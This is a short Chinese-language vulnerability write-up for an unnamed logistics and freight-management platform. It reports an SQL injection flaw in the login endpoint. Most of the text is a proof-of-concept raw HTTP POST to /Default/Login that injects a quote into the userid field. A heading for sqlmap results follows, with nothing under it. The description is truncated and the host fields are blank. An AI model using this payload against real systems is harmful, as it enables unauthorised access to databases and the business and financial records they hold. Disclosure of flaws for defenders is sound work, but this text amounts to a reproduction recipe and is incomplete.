漏洞描述
高效. 打通信息流,货物中转状态实时可见,财务对账结算清晰透明,管理更加高效便捷。在实现上存在SQL注入漏洞
漏洞复现
POC:
POST /Default/Login HTTP/1.1
Host:
Content-Length: 23
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://
Referer: http:/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
userid=admin'&userpwd=1
sqlmap结果